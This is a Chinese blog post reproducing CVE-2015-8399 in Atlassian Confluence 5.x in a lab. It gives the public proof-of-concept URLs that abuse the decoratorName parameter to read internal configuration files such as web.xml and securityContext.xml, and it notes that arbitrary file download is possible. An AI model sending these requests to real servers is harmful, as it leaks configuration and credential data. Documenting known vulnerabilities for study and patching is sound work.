[CVE-2015-8399]Confluence敏感信息泄露

最新推荐文章于 2024-06-05 17:29:34 发布
最新推荐文章于 2024-06-05 17:29:34 发布
阅读量1.9k 收藏 1
点赞数
分类专栏: java 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/caiqiiqi/article/details/106004003
版权
安全 同时被 2 个专栏收录
264 篇文章 9 订阅
订阅专栏
java
213 篇文章 3 订阅
订阅专栏

影响版本:
5.2 / 5.8.14 / 5.8.15

下载选择:
在这里插入图片描述
https://www.atlassian.com/zh/software/confluence/download-archives

发现server版已经不提供trial license了:
在这里插入图片描述

https://product-downloads.atlassian.com/software/confluence/downloads/atlassian-confluence-5.8.15.zip

       [PoC]
            http://<Confluence Server>/spaces/viewdefaultdecorator.action?decoratorName=<FILE>
            http://<Confluence Server>/admin/viewdefaultdecorator.action?decoratorName=<FILE>

            This is an example of accepted <FILE> parameters
            /WEB-INF/decorators.xml
            /WEB-INF/glue-config.xml
            /WEB-INF/server-config.wsdd
            /WEB-INF/sitemesh.xml
            /WEB-INF/urlrewrite.xml
            /WEB-INF/web.xml
            /databaseSubsystemContext.xml
            /securityContext.xml
            /services/statusServiceContext.xml
            com/atlassian/confluence/security/SpacePermission.hbm.xml
            com/atlassian/confluence/user/OSUUser.hbm.xml
            com/atlassian/confluence/security/ContentPermissionSet.hbm.xml
            com/atlassian/confluence/user/ConfluenceUser.hbm.xml

比如:
http://192.168.85.129:8090/spaces/viewdefaultdecorator.action?decoratorName=/WEB-INF/web.xml
在这里插入图片描述

参考:
https://www.exploit-db.com/exploits/39170
https://jira.atlassian.com/browse/CONFSERVER-39704

补充:
利用file协议可以实现任意文件下载。

在这里插入图片描述

caiqiiqi
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
在三星Android手机上从Fuzzing漏洞挖掘到RCE漏洞利用
systemino的博客
05-21 1110
我们进行了一些在三星Android手机上的安全性研究,这些研究证明了通过发送无用户交互的mms,可以从Fuzzing模糊测试到实现远程代码执行利用。 Google的Project Zero致力于挖掘0-day漏洞并破解各种产品,他们已经在三星的Android Skia图像处理库中发现一些堆溢出问题。 此漏洞由团队成员Mateusz Jurczyk发现的。此漏洞使恶意MMS能够触发远程代码执行,该漏洞是在图像处理中发生的,图像处理是在收到短信并且由Android的Skia库处理图像而没有用户交互时发生的。
CVE-2017-7415:[Confluence]未授权信息泄露(低版本)
公众号shadow sock7
08-20 520
官网公告: https://confluence.atlassian.com/doc/confluence-security-advisory-2017-04-19-887071137.html 官方漏洞追踪: https://jira.atlassian.com/browse/CONFSERVER-52222 其他信息 https://nvd.nist.gov/vuln/detail/CVE-2...
atlassian confluece 信息泄露漏洞
cnbird's blog
08-28 1718
#!/usr/bin/env python import httplib, json, sys, re if (re.search("^https://", sys.argv[1].lower()) == None): httpconnection = httplib.HTTPConnection(re.split("^http://",sys.argv[1].lower())[1])
Atlassian Confluence 高危漏洞可导致代码执行
最新发布
smellycat000的专栏
06-05 68
聚焦源代码安全,网罗国内外最新资讯!编译:代码卫士SonicWall Capture Labs 的研究团队发现了 Atlassian Confluence Data Center and Server 中的一个远程代码执行漏洞。该漏洞的编号是CVE-2024-21683,CVSS评分为8.3,可导致认证攻击者执行任意代码。要利用该漏洞,攻击者必须具有对易受攻击系统的网络访问权限,并拥有增加新的宏...
CVE-2022-26134 Confluence远程命令执行漏洞复现
weixin_48421613的博客
06-05 6133
CVE-2022-26134 Confluence远程命令执行漏洞复现
【高危】Atlassian Confluence 远程代码执行漏洞
murphysec的博客
07-25 481
Confluence 是由 Atlassian 开发的知识管理与协同软件,通常在企业内部用作wiki系统。Confluence 7.19.8到8.2.0之前的版本中存在远程代码执行漏洞,具有登录权限的攻击者无需用户交互即可在 Confluence 服务器中执行任意命令。
FREAK-Attack-CVE-2015-0204-Testing-Script:根据 Akamai 的建议,针对 FREAK 攻击 (CVE-2015-0204) 自动执行基于 OpenSSL 的测试的基本 BASH 脚本
06-20
根据 Akamai 的建议,针对 FREAK 攻击 (CVE-2015-0204) 自动执行基于 OpenSSL 的测试的基本 BASH 脚本。 它是一个免费软件,不需要别人的服务器来运行。 您的服务器在正常情况下必须通过 SSL Labs 测试获得 A+ 的...
CVE-2015-5119_walkthrough:文章CVE-2015-5119 Flash ByteArray UaF的存档
05-10
**CVE-2015-5119 Walkthrough: ActionScript中的Flash ByteArray Use-After-Free漏洞** 在本文中,我们将深入探讨一个重要的安全漏洞,即CVE-2015-5119,这是一个影响Adobe Flash Player的Use-After-Free(UAF)...
cpx_proftpd:漏洞利用工具 CVE-2015-3306
06-11
cpx_proftpd Daniel Aldana 针对漏洞利用的 PoC。 Vadim Melihow 报告的错误。 ###方法1: 用法: python cpx_proftp.py <IP> <REMOTE> 前任: python cpx_proftp.py 127.0.0.1 /etc/passwd /...然后尝试: ...
CVE-2015-1701:APT攻击中使用的Win32k LPE漏洞
01-30
这些攻击者利用零日漏洞(未公开的漏洞)或已知但未修复的漏洞,如CVE-2015-1701,来悄悄地侵入系统,保持长期的隐蔽性,并逐渐获取敏感信息。 **漏洞利用** 利用CVE-2015-1701通常涉及以下几个步骤: 1. **初始...
juniper-cve-2015-7755:从Juniper ScreenOS中对CVE-2015-7755和CVE-2015-7756问题的分析得出的注释,二进制文件和相关信息
05-25
瞻博网络CVE-2015-7755和CVE-2015-7756 该存储库包含笔记,二进制文件和有关Juniper ScreenOS中CVE-2015-7755和CVE-2015-7756问题的分析的相关信息。 有关这些问题的更多信息,请参见下面的URL: 发现CVE-2015-7755...
Atlassian Confluence任意文件读取漏洞
weixin_30877493的博客
05-03 400
Atlassian Confluence Atlassian Confluence是澳大利亚Atlassian公司的一套专业的企业知识管理与协同软件,也可以用于构建企业WiKi。该软件可实现团队成员之间的协作和知识共享。 漏洞简介 漏洞名称:任意文件读取 漏洞类型:WEB类型漏洞 影响版本:小于或等于5.8.17版本 漏洞评级:高危 漏洞详情 漏洞请求: https://hostdomai...
CVE-2015-2370漏洞成因分析
如鹿渴慕泉水的专栏
12-01 1014
###漏洞成因分析### 官方链接https://bugs.chromium.org/p/project-zero/issues/detail?id=325&amp;amp;amp;can=1&amp;amp;amp;q=dcom&amp;amp;amp;colspec=ID%20Status%20Restrict%20Reported%20Vendor%20Product%20Finder%20Summary 这个漏洞是一种DCOM DCE/...
ElasticSearch 目录穿越漏洞(CVE-2015-5531)
黑白的博客
12-13 1435
声明 好好学习,天天向上 漏洞描述 elasticsearch 1.5.1及以前,无需任何配置即可触发该漏洞。之后的新版,配置文件elasticsearch.yml中必须存在path.repo,该配置值为一个目录,且该目录必须可写,等于限制了备份仓库的根位置。不配置该值,默认不启动这个功能。 影响范围 1.6.1以下 复现过程 这里使用v1.6.0版本 使用vulhub cd /app/vulhub-master/elasticsearch/CVE-2015-5531 使用docker启动 docker-
Android 5.0屏幕录制漏洞(CVE-2015-3878)威胁预警
zhangzhuo1024的博客
11-08 1435
第一章 漏洞原理 一、Android 5.0新特性 Android 5.0新增的屏幕录制接口,无需特殊权限,使用如下系统API即可实现屏幕录制功能: 发起录制请求后,系统弹出如下提示框请求用户确认: 在上图中,“AZ Screen Recorder”为需要录制屏幕的软件名称,“将开始截取您的屏幕上显示的所有内容”是系统自带的提示信息,不可更改或删除。用户点击
解决POC脚本对多种URL的自适应问题
乐枕的家
05-08 968
在批量POC的过程中,我们采集到的URL状态往往是不同的. 因此我们需要对URL进行统一处理,从而确保POC脚本能够准确的验证每个URL我们以实际漏洞举例说明,并给出我的批量POC解决方案.漏洞示例 Atlassian Confluence 5.8.17 之前版本中存在漏洞,该漏洞源于spaces/viewdefaultdecorator.action和admin/viewdefaultdec
CentOS7 NTP CVE-2015-7853漏洞修复——筑梦之路
筑梦之路
12-16 619
NTP扫描出来的漏洞很多,不止CVE-2015-7853这一个漏洞,网上也有很多关于此漏洞的文章,这里就不赘述。如何修复该漏洞,我这里做个记录。
一次消息消费服务的内存泄漏排查小记
云树在路上
02-19 661
线上有一个消息消费服务xxx-consumer,使用spring-kafka框架,主线程批量从消费队列(kafka)拉取交易系统生产的消息,然后提交到子线程池中挨个处理消费。 public abstract class AbstractMessageDispatchListener implements BatchAcknowledgingMessageListener<String, Msg>, ApplicationListener<ApplicationReady
cve-2015-8878
12-27
CVE-2015-8878是一种安全漏洞,它影响到了许多操作系统和软件。这个漏洞主要是通过网络进行攻击,攻击者可以利用它来远程执行恶意代码,从而获取系统的控制权限。 这个漏洞主要存在于某些操作系统和软件的内核中,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值